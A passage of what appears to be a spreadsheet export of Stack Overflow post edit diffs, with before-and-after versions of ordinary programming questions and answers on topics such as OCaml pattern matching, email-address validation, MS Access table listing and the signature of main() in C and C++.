 &lt;p&gt; Patterns give you a small language to describe the structure of the values you want to match. The structure can be arbitrarily deep and you can bind variables to parts of the structured value.&lt;/p&gt; _x000D_
 &lt;p&gt; This allows you to write things extremely succinctly. You can illustrate this with a small example, such as a derivative function for a simple type of mathematical expressions:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;type expr =_x000D_
    | Int of int_x000D_
    | Var of string_x000D_
    | Add of expr &lt;span class="diff-add"&gt;*&lt;/span&gt; expr_x000D_
    | Mul of expr * expr;;_x000D_
_x000D_
let rec d(f, x) =_x000D_
    match f with_x000D_
    | Var y when x=y -&amp;gt; Int 1_x000D_
    | Int _ | Var _ -&amp;gt; Int 0_x000D_
    | Add(f, g) -&amp;gt; Add(d(f, x), d(g, x))_x000D_
    | Mul(f, g) -&amp;gt; Add(Mul(f, d(g, x)), Mul(g, d(f, x)));;_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; Additionally, because pattern matching is a static construct for static types, the compiler can (i) verify that you covered all cases (ii) detect redundant branches that can never match any value (iii) provide a very efficient implementation (with jumps etc.).&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>JasCav</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I'm sorry for this very newbish question I'm not much given into web development. I've got this cool javascript on a .js file that we want to use at a small web site. (It's a script to run piclens on it).&lt;/p&gt; _x000D_
 &lt;p&gt; Can anyone point me some directions on how to use the .js file? Or how to attach it to my html code.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I'm sorry for this very newbish question I'm not much given into web development. I've got this cool javascript on a .js file that we want to use at a small web site. (It's a script to run piclens on it).&lt;/p&gt; _x000D_
 &lt;p&gt; Can anyone point me some directions on how to use the .js file? Or how to attach it to my html code.&lt;span class="diff-add"&gt; Ty :)&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; If you feel this is a traditional "please read the manual" i would be happy 2 but haven't been able to find out how to do it :(&lt;/span&gt;&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>fmsf</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; One of the funnier things to discover: italics and bold text makrup does not work with &lt;code&gt;&lt;span class="diff-delete"&gt;CJK&lt;/span&gt;&lt;/code&gt; (Chinese/Japanese/Korean) characters.&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt;&amp;nbsp;&lt;/span&gt; They simply become unreadable. (OK, I couldn't really read them before either, but especially bolding just creates ink blots)&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; One of the funnier things to discover: italics and bold text makrup does not work with &lt;span class="diff-add"&gt;CJK&lt;/span&gt; (Chinese/Japanese/Korean) characters. They simply become unreadable. (OK, I couldn't really read them before either, but especially bolding just creates ink blots)&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; A strict equality operator will tell you if two object &lt;strong&gt;types&lt;/strong&gt; are equal, however, is there any way to tell if two objects are equal, much like the hash code value in Java?&lt;/p&gt; _x000D_
 &lt;p&gt; This is similar to this question, but requires a more academic answer:&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;a href="http://stackoverflow.com/questions/194846/is-there-any-kind-of-hashcode-function-in-javascript"&gt;Is there any kind of hash code function in JavaScript?&lt;/a&gt;&lt;/p&gt; _x000D_
 &lt;p&gt; The scenario above demonstrates why it would be necessary to have one, and I'm wondering if there is any equivalent solution.&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt; EDIT:&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt; Whoever edited the title, can you please change it back. I want this to be specific to JavaScript, so that developers have the understanding that this is the requirement. I don't want this to dissolve into an object equality debate for other languages.&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; A strict equality operator will tell you if two object &lt;strong&gt;types&lt;/strong&gt; are equal, however, is there any way to tell if two objects are equal, much like the hash code value in Java?&lt;/p&gt; _x000D_
 &lt;p&gt; This is similar to this question, but requires a more academic answer:&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;a href="http://stackoverflow.com/questions/194846/is-there-any-kind-of-hashcode-function-in-javascript"&gt;Is there any kind of hash code function in JavaScript?&lt;/a&gt;&lt;/p&gt; _x000D_
 &lt;p&gt; The scenario above demonstrates why it would be necessary to have one, and I'm wondering if there is any equivalent solution.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>user4903</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; There is no simple regular expression for this problem: see &lt;a href="http://ex-parrot.com/%7Epdw/Mail-RFC822-Address.html" rel="nofollow noreferrer"&gt;this fully RFCâ€‘822â€“compliant regex&lt;/a&gt;, which is anything but simple. (It was written before the days of grammatical patterns.) The grammar specified in &lt;a href="http://www.ietf.org/rfc/rfc5322.txt" rel="nofollow noreferrer"&gt;RFC 5322&lt;/a&gt; is too complicated for primitive regular expressions, although the more sophisticated grammatical patterns in Perl, PCRE, and PHP can all &lt;a href="http://stackoverflow.com/questions/201323/what-is-the-best-regular-expression-for-validating-email-addresses/1917982#1917982"&gt;manage to correctly parse RFC 5322 without a hitch&lt;/a&gt;. Python and C&lt;sup&gt;â™¯&lt;/sup&gt; should also be able to manage it, but they use a different syntax from those first three.&lt;/p&gt; _x000D_
 &lt;p&gt; However, if you are forced to use one of the many less powerful pattern-matching languages, then itâ€™s best to use a real parser. But understand that validating it per the RFC tells you absolutely nothing about whether the person entering the address is its true owner. People sign others up to mailing lists this way all the time. Fixing that requires a fancier kind of validation that involves sending that address a message that includes a confirmation token meant to be entered in the same web page as was the address.&lt;/p&gt; _x000D_
 &lt;p&gt; Thatâ€™s the only way to know you got the address of the person entering it, which is why most mailing lists now use that mechanism to confirm sign-ups. After all, anybody can put down &lt;code&gt;president@whitehouse.gov&lt;/code&gt;, and that will even parse as legal, but it isnâ€™t likely to be the person at the other end.&lt;/p&gt; _x000D_
 &lt;p&gt; For PHP, you should &lt;em&gt;not&lt;/em&gt; use the pattern given &lt;span class="diff-delete"&gt;in&lt;/span&gt; &lt;a href="http://www.linuxjournal.com/article/9585" rel="nofollow noreferrer"&gt;Validate an E-Mail Address with PHP, the Right Way&lt;/a&gt; from which I quote "There is some danger that common usage and widespread sloppy coding will establish a de facto standard for e-mail addresses that is more restrictive than the recorded formal standard." That is no better than all the other non-RFC patterns. It isnâ€™t even smart enough to handle even RFC 822, let alone RFC 5322. &lt;a href="http://stackoverflow.com/questions/201323/what-is-the-best-regular-expression-for-validating-email-addresses/1917982#1917982"&gt;This one&lt;/a&gt;, however&lt;span class="diff-delete"&gt;, is.&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt; If you want to get fancy and pedantic, &lt;/span&gt;&lt;a href="http://cubicspot.blogspot.com/2012/06/correct-way-to-validate-e-mail-address.html" rel="nofollow noreferrer"&gt;&lt;span class="diff-delete"&gt;implement a complete state engine&lt;/span&gt;&lt;/a&gt;&lt;span class="diff-delete"&gt;. A regular expression can only act as a rudimentary filter. The problem with regular expressions is that telling someone that their perfectly valid e-mail address is invalid (a false positive) because your regular expression can't handle it is just rude and impolite from the user's perspective. A state engine for the purpose can both validate and even correct e-mail addresses that would otherwise be considered invalid as it disassembles the e-mail address according to each RFC. This allows for a potentially more pleasing experience&lt;/span&gt;,&lt;span class="diff-delete"&gt; "The specified e-mail address 'myemail@address,com'&lt;/span&gt; is&lt;span class="diff-delete"&gt; invalid&lt;/span&gt;.&lt;span class="diff-delete"&gt; Did you mean 'myemail@address.com'?"&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;p&gt; See also &lt;a href="http://worsethanfailure.com/Articles/Validating_Email_Addresses.aspx" rel="nofollow noreferrer"&gt;Validating Email Addresses&lt;/a&gt;, including the comments. Or &lt;a href="http://fightingforalostcause.net/misc/2006/compare-email-regex.php" rel="nofollow noreferrer"&gt;Comparing E-mail Address Validating Regular Expressions&lt;/a&gt;.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; There is no simple regular expression for this problem: see &lt;a href="http://ex-parrot.com/%7Epdw/Mail-RFC822-Address.html" rel="nofollow noreferrer"&gt;this fully RFCâ€‘822â€“compliant regex&lt;/a&gt;, which is anything but simple. (It was written before the days of grammatical patterns.) The grammar specified in &lt;a href="http://www.ietf.org/rfc/rfc5322.txt" rel="nofollow noreferrer"&gt;RFC 5322&lt;/a&gt; is too complicated for primitive regular expressions, although the more sophisticated grammatical patterns in Perl, PCRE, and PHP can all &lt;a href="http://stackoverflow.com/questions/201323/what-is-the-best-regular-expression-for-validating-email-addresses/1917982#1917982"&gt;manage to correctly parse RFC 5322 without a hitch&lt;/a&gt;. Python and C&lt;sup&gt;â™¯&lt;/sup&gt; should also be able to manage it, but they use a different syntax from those first three.&lt;/p&gt; _x000D_
 &lt;p&gt; However, if you are forced to use one of the many less powerful pattern-matching languages, then itâ€™s best to use a real parser. But understand that validating it per the RFC tells you absolutely nothing about whether the person entering the address is its true owner. People sign others up to mailing lists this way all the time. Fixing that requires a fancier kind of validation that involves sending that address a message that includes a confirmation token meant to be entered in the same web page as was the address.&lt;/p&gt; _x000D_
 &lt;p&gt; Thatâ€™s the only way to know you got the address of the person entering it, which is why most mailing lists now use that mechanism to confirm sign-ups. After all, anybody can put down &lt;code&gt;president@whitehouse.gov&lt;/code&gt;, and that will even parse as legal, but it isnâ€™t likely to be the person at the other end.&lt;/p&gt; _x000D_
 &lt;p&gt; For PHP, you should &lt;em&gt;not&lt;/em&gt; use the pattern given &lt;span class="diff-add"&gt; in&lt;/span&gt; &lt;a href="http://www.linuxjournal.com/article/9585" rel="nofollow noreferrer"&gt;Validate an E-Mail Address with PHP, the Right Way&lt;/a&gt; from which I quote "There is some danger that common usage and widespread sloppy coding will establish a de facto standard for e-mail addresses that is more restrictive than the recorded formal standard." That is no better than all the other non-RFC patterns. It isnâ€™t even smart enough to handle even RFC 822, let alone RFC 5322. &lt;a href="http://stackoverflow.com/questions/201323/what-is-the-best-regular-expression-for-validating-email-addresses/1917982#1917982"&gt;This one&lt;/a&gt;, however, is.&lt;/p&gt; _x000D_
 &lt;p&gt; See also &lt;a href="http://worsethanfailure.com/Articles/Validating_Email_Addresses.aspx" rel="nofollow noreferrer"&gt;Validating Email Addresses&lt;/a&gt;, including the comments. Or &lt;a href="http://fightingforalostcause.net/misc/2006/compare-email-regex.php" rel="nofollow noreferrer"&gt;Comparing E-mail Address Validating Regular Expressions&lt;/a&gt;.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Manoz</t>
  </si>
  <si>
    <t>CubicleSoft</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Sounds like the login button is being spat out as &lt;code&gt;&amp;lt;input &lt;span class="diff-delete"&gt;type="button"&amp;gt;&lt;/span&gt;&lt;/code&gt; rather than &lt;code&gt;&amp;lt;input type="submit"&amp;gt;&lt;/code&gt;. You could always template the &lt;span class="diff-delete"&gt;Login control&lt;/span&gt; and add the submit button, getting rid of the hideous default markup at the same time!&lt;/p&gt; _x000D_
 &lt;p&gt; If you have to use &lt;span class="diff-delete"&gt;JavaScript&lt;/span&gt; to fix this something is seriously wrong! (but then it sounds like you know this)&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Sounds like the login button is being spat out as &lt;code&gt;&amp;lt;input &lt;span class="diff-add"&gt;type="buttom"&amp;gt;&lt;/span&gt;&lt;/code&gt; rather than &lt;code&gt;&amp;lt;input type="submit"&amp;gt;&lt;/code&gt;. You could always template the &lt;span class="diff-add"&gt;LoginControl&lt;/span&gt; and add the submit button, getting rid of the hideous default markup at the same time!&lt;/p&gt; _x000D_
 &lt;p&gt; If you have to use &lt;span class="diff-add"&gt;Javascript&lt;/span&gt; to fix this something is seriously wrong! (but then it sounds like you know this)&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>roryf</t>
  </si>
  <si>
    <t>abatishchev</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Can someone give me the code to encrypt and decrypt a &lt;code&gt;&lt;span class="diff-delete"&gt;string&lt;/span&gt;&lt;/code&gt; in C#?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Can someone give me the code to encrypt and decrypt a &lt;span class="diff-add"&gt;string&lt;/span&gt; in C#?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>CodeCaster</t>
  </si>
  <si>
    <t>Tamir Vered</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; To build on Ilya's answer try the following query:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;SELECT MSysObjects.Name AS table_name_x000D_
FROM MSysObjects_x000D_
WHERE (((Left([Name],1))&amp;lt;&amp;gt;"~") _x000D_
        AND ((Left([Name],4))&amp;lt;&amp;gt;"MSys") _x000D_
        AND ((MSysObjects.Type) In (1,4,6)));_x000D_
order by MSysObjects.Name _x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt; This method only works with MS Access 2003 and below. For versions of MS Access 2007 and above you must use the GetSchema method of the connection string get a DataTable of table names. At that point you can then use linq or a loop to iterate through the tables to find the specific table your looking for.&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt; Below is a link to a site on getting a list of tables in MS Access. This method&lt;/span&gt; works &lt;span class="diff-delete"&gt;for all versions of MS Access. &lt;/span&gt; _x000D_
  &lt;strike&gt; _x000D_
   &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
   &lt;a href="http://davidhayden.com/blog/dave/archive/2006/10/01/GetListOfTablesInMicrosoftAccessUsingGetSchema.aspx" rel="nofollow noreferrer"&gt;&lt;span class="diff-delete"&gt;http://davidhayden.com/blog/dave/archive/2006/10/01/GetListOfTablesInMicrosoftAccessUsingGetSchema.aspx&lt;/span&gt;&lt;/a&gt; _x000D_
   &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
  &lt;/strike&gt;&lt;span class="diff-delete"&gt;[Broken]&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;strong&gt;&lt;span class="diff-delete"&gt;Edit:&lt;/span&gt;&lt;/strong&gt;&lt;span class="diff-delete"&gt; From the &lt;/span&gt;&lt;a href="http://web.archive.org/web/20110701205038/http://davidhayden.com/blog/dave/archive/2006/10/01/GetListOfTablesInMicrosoftAccessUsingGetSchema.aspx" rel="nofollow noreferrer"&gt;&lt;span class="diff-delete"&gt;Internet Wayback Machine &lt;/span&gt;&lt;/a&gt;&lt;span class="diff-delete"&gt;, the formerly linked page contained the following by David Hayden :&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;blockquote&gt; _x000D_
  &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
  &lt;p&gt;&lt;span class="diff-delete"&gt; Here is the code to get a list of tables in an Access Database, short and sweet:&lt;/span&gt;&lt;/p&gt; _x000D_
  &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;/blockquote&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;// Microsoft Access provider factory_x000D_
DbProviderFactory factory = DbProviderFactories.GetFactory("System.Data.OleDb");_x000D_
_x000D_
DataTable userTables = null;_x000D_
_x000D_
using (DbConnection connection =_x000D_
        factory.CreateConnection())_x000D_
{_x000D_
    // c:\test\test.mdb_x000D_
    connection.ConnectionString = "Provider=Microsoft_x000D_
            .Jet.OLEDB.4.0;Data Source=c:\\test\\test.mdb";_x000D_
_x000D_
    // We only want user tables, not system tables_x000D_
    string[] restrictions = new string[4];_x000D_
    restrictions[3] = "Table";_x000D_
_x000D_
    connection.Open();_x000D_
_x000D_
    // Get list of user tables_x000D_
    userTables = connection.GetSchema("Tables", restrictions);_x000D_
}_x000D_
_x000D_
// Add list of table names to listBox_x000D_
for (int i=0; i &amp;lt; userTables.Rows.Count; i++)_x000D_
    listBox1.Items.Add(userTables.Rows[i][2].ToString());_x000D_
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; To build on Ilya's answer try the following query:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;SELECT MSysObjects.Name AS table_name_x000D_
FROM MSysObjects_x000D_
WHERE (((Left([Name],1))&amp;lt;&amp;gt;"~") _x000D_
        AND ((Left([Name],4))&amp;lt;&amp;gt;"MSys") _x000D_
        AND ((MSysObjects.Type) In (1,4,6)));_x000D_
order by MSysObjects.Name _x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt;(this one&lt;/span&gt; works &lt;span class="diff-add"&gt;without modification)&lt;/span&gt;&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>BIBD</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; What are the best open source image gallery engines? Both stand-alone, and for existing frameworks such as Wordpress or Drupal&lt;span class="diff-delete"&gt;?&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;p&gt; Hopefully we can build a good list here over time.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; What are the best open source image gallery engines? Both stand-alone, and for existing frameworks such as Wordpress or Drupal&lt;span class="diff-add"&gt;.&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;p&gt; Hopefully we can build a good list here over time.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>user4812</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Oracle handling of NULLs links:&lt;/p&gt; _x000D_
 &lt;ul&gt; _x000D_
  &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;a href="http://digitalbush.com/2007/10/27/oracle-9i-null-behavior/" rel="nofollow noreferrer"&gt;&lt;span class="diff-delete"&gt;http://digitalbush.com/2007/10/27/oracle-9i-null-behavior/&lt;/span&gt;&lt;/a&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;a href="http://jeffkemponoracle.com/2006/02/empty-string-andor-null.html" rel="nofollow noreferrer"&gt;&lt;span class="diff-delete"&gt;http://jeffkemponoracle.com/2006/02/empty-string-andor-null.html&lt;/span&gt;&lt;/a&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;/ul&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; Indeed, I have had nothing but difficulties in dealing with&lt;/span&gt; Oracle&lt;span class="diff-add"&gt;, including invalid datetime values (cannot be printed, converted or anything, just looked at with the DUMP() function) which are &lt;/span&gt;&lt;strong&gt;&lt;span class="diff-add"&gt;allowed&lt;/span&gt;&lt;/strong&gt;&lt;span class="diff-add"&gt; to be inserted into the database, apparently through some buggy version of the client as a binary column! So much for protecting database integrity!&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; Oracle&lt;/span&gt; handling of NULLs links:&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;a href="http://digitalbush.com/2007/10/27/oracle-9i-null-behavior/" rel="nofollow noreferrer"&gt;&lt;span class="diff-add"&gt;http://digitalbush.com/2007/10/27/oracle-9i-null-behavior/&lt;/span&gt;&lt;/a&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;a href="http://jeffkemponoracle.com/2006/02/empty-string-andor-null.html" rel="nofollow noreferrer"&gt;&lt;span class="diff-add"&gt;http://jeffkemponoracle.com/2006/02/empty-string-andor-null.html&lt;/span&gt;&lt;/a&gt;&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Cade Roux</t>
  </si>
  <si>
    <t>user212218</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; It's not possible and doing so would violate the implied IS-A relationship between ChildClass and ParentClass. Why do you want to do this?&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;em&gt;&lt;span class="diff-delete"&gt;Update-Gishu&lt;/span&gt;&lt;/em&gt;&lt;span class="diff-delete"&gt;: Workaround = Don't derive.. if you don't intend to satisfy the contract declared by your base type. Use Composition.&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; It's not possible and doing so would violate the implied IS-A relationship between ChildClass and ParentClass. Why do you want to do this?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; What is the correct (most efficient) way to define the &lt;code&gt;main()&lt;/code&gt; function in C and C++ â€” &lt;code&gt;int main()&lt;/code&gt; or &lt;code&gt;void main()&lt;/code&gt; â€” and why? If &lt;code&gt;int main()&lt;/code&gt; then &lt;code&gt;return 1&lt;/code&gt; or &lt;code&gt;return 0&lt;/code&gt;?&lt;span class="diff-delete"&gt;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lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;hr&gt; _x000D_
 &lt;p&gt;&lt;em&gt;There are numerous duplicates of this question, including:&lt;/em&gt;&lt;/p&gt; _x000D_
 &lt;ul&gt; _x000D_
  &lt;li&gt;&lt;a href="http://stackoverflow.com/questions/2108192/what-are-the-valid-signatures-for-cs-main-function/"&gt;What are the valid signatures for C's &lt;code&gt;main()&lt;/code&gt; function?&lt;/a&gt;&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;a href="http://stackoverflow.com/questions/17715008/the-return-type-of-main-function/"&gt;The return type of &lt;code&gt;main()&lt;/code&gt; function&lt;/a&gt;&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;a href="http://stackoverflow.com/questions/636829/difference-between-void-main-and-int-main"&gt;Difference between &lt;code&gt;void main()&lt;/code&gt; and &lt;code&gt;int main()&lt;/code&gt;?&lt;/a&gt;&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;a href="http://stackoverflow.com/questions/1621574/mains-signature-in-c"&gt;&lt;code&gt;main()&lt;/code&gt;'s signature in C++&lt;/a&gt;&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;a href="http://stackoverflow.com/questions/4207134/what-is-the-proper-declaration-of-main"&gt;What is the proper declaration of &lt;code&gt;main()&lt;/code&gt;?&lt;/a&gt; â€” For C++, with a very good answer indeed.&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;a href="http://stackoverflow.com/questions/8692120/styles-of-main-functions-in-c"&gt;Styles of &lt;code&gt;main()&lt;/code&gt; functions in C&lt;/a&gt;&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;a href="http://stackoverflow.com/questions/10915713/return-type-of-main-method-in-c"&gt;Return type of &lt;code&gt;main()&lt;/code&gt; method in C&lt;/a&gt;&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;a href="http://stackoverflow.com/questions/9356510/int-main-vs-void-main-in-c"&gt;&lt;code&gt;int main()&lt;/code&gt; vs &lt;code&gt;void main()&lt;/code&gt; in C&lt;/a&gt;&lt;/li&gt; _x000D_
 &lt;/ul&gt; _x000D_
 &lt;p&gt; Related:&lt;/p&gt; _x000D_
 &lt;ul&gt; _x000D_
  &lt;li&gt;&lt;a href="http://stackoverflow.com/questions/5191965/c-int-mainint-argc-char-argv"&gt;C++ â€” &lt;code&gt;int main(int argc, char **argv)&lt;/code&gt;&lt;/a&gt;&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;a href="http://stackoverflow.com/questions/5217395/c-int-mainint-argc-char-argv"&gt;C++ â€” &lt;code&gt;int main(int argc, char *argv[])&lt;/code&gt;&lt;/a&gt;&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;a href="http://stackoverflow.com/questions/10321435/is-char-envp-as-a-third-argument-to-main-portable"&gt;Is &lt;code&gt;char *envp[]&lt;/code&gt; as a third argument to &lt;code&gt;main()&lt;/code&gt; portable?&lt;/a&gt;&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;a href="http://stackoverflow.com/questions/18402853/must-the-int-main-function-return-a-value-in-all-compilers"&gt;Must the &lt;code&gt;int main()&lt;/code&gt; function return a value in all compilers?&lt;/a&gt;&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;a href="http://stackoverflow.com/questions/5296163/why-is-the-type-of-the-main-function-in-c-and-c-left-to-the-user-to-define"&gt;Why is the type of the &lt;code&gt;main()&lt;/code&gt; function in C and C++ left to the user to define?&lt;/a&gt;&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;a href="http://stackoverflow.com/questions/22239/why-does-int-main-compile"&gt;Why does &lt;code&gt;int main(){}&lt;/code&gt; compile?&lt;/a&gt;&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;a href="http://stackoverflow.com/questions/26470912/legal-definitions-of-main-in-c14"&gt;Legal definitions of &lt;code&gt;main()&lt;/code&gt; in C++14?&lt;/a&gt;&lt;/li&gt; _x000D_
 &lt;/ul&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; What is the correct (most efficient) way to define the &lt;code&gt;main()&lt;/code&gt; function in C and C++ â€” &lt;code&gt;int main()&lt;/code&gt; or &lt;code&gt;void main()&lt;/code&gt; â€” and why? If &lt;code&gt;int main()&lt;/code&gt; then &lt;code&gt;return 1&lt;/code&gt; or &lt;code&gt;return 0&lt;/code&gt;?&lt;/p&gt; _x000D_
 &lt;hr&gt; _x000D_
 &lt;p&gt;&lt;em&gt;There are numerous duplicates of this question, including:&lt;/em&gt;&lt;/p&gt; _x000D_
 &lt;ul&gt; _x000D_
  &lt;li&gt;&lt;a href="http://stackoverflow.com/questions/2108192/what-are-the-valid-signatures-for-cs-main-function/"&gt;What are the valid signatures for C's &lt;code&gt;main()&lt;/code&gt; function?&lt;/a&gt;&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;a href="http://stackoverflow.com/questions/17715008/the-return-type-of-main-function/"&gt;The return type of &lt;code&gt;main()&lt;/code&gt; function&lt;/a&gt;&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;a href="http://stackoverflow.com/questions/636829/difference-between-void-main-and-int-main"&gt;Difference between &lt;code&gt;void main()&lt;/code&gt; and &lt;code&gt;int main()&lt;/code&gt;?&lt;/a&gt;&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;a href="http://stackoverflow.com/questions/1621574/mains-signature-in-c"&gt;&lt;code&gt;main()&lt;/code&gt;'s signature in C++&lt;/a&gt;&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;a href="http://stackoverflow.com/questions/4207134/what-is-the-proper-declaration-of-main"&gt;What is the proper declaration of &lt;code&gt;main()&lt;/code&gt;?&lt;/a&gt; â€” For C++, with a very good answer indeed.&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;a href="http://stackoverflow.com/questions/8692120/styles-of-main-functions-in-c"&gt;Styles of &lt;code&gt;main()&lt;/code&gt; functions in C&lt;/a&gt;&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;a href="http://stackoverflow.com/questions/10915713/return-type-of-main-method-in-c"&gt;Return type of &lt;code&gt;main()&lt;/code&gt; method in C&lt;/a&gt;&lt;/li&gt; _x000D_
